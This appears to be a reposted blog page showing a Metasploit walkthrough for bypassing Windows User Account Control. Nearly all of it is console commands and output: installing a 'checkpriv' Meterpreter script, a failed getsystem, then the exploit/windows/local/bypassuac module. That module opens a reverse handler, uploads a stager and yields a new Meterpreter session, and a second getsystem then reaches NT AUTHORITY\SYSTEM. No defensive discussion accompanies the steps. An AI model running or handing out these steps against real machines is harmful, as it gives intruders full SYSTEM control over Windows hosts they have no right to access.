Metasploit - bypassuac

Source: Internet  Editor: 程序博客网  Time: 2024/06/04 12:02

Download: checkpriv

Installation:
cp checkpriv.rb /opt/metasploit-framework/scripts/meterpreter/checkpriv.rb

meterpreter > run checkpriv
[*] Admin token: false
[*] Running as SYSTEM: false
[*] UAC Enabled: true
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)

msf exploit(bypassuac) > use exploit/windows/local/bypassuac
msf exploit(bypassuac) > set SESSION 3
SESSION => 3
msf exploit(bypassuac) > run
[*] Started reverse handler on 192.168.1.100:4444
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[+] Part of Administrators group! Continuing...
[*] Uploaded the agent to the filesystem....
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Sending stage (957486 bytes) to 192.168.1.100
[*] Meterpreter session 5 opened (192.168.1.100:4444 -> 192.168.1.100:53232) at 2015-11-17 14:48:09 +0000

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run checkpriv
[*] Admin token: true
[*] Running as SYSTEM: true
[*] UAC Enabled: false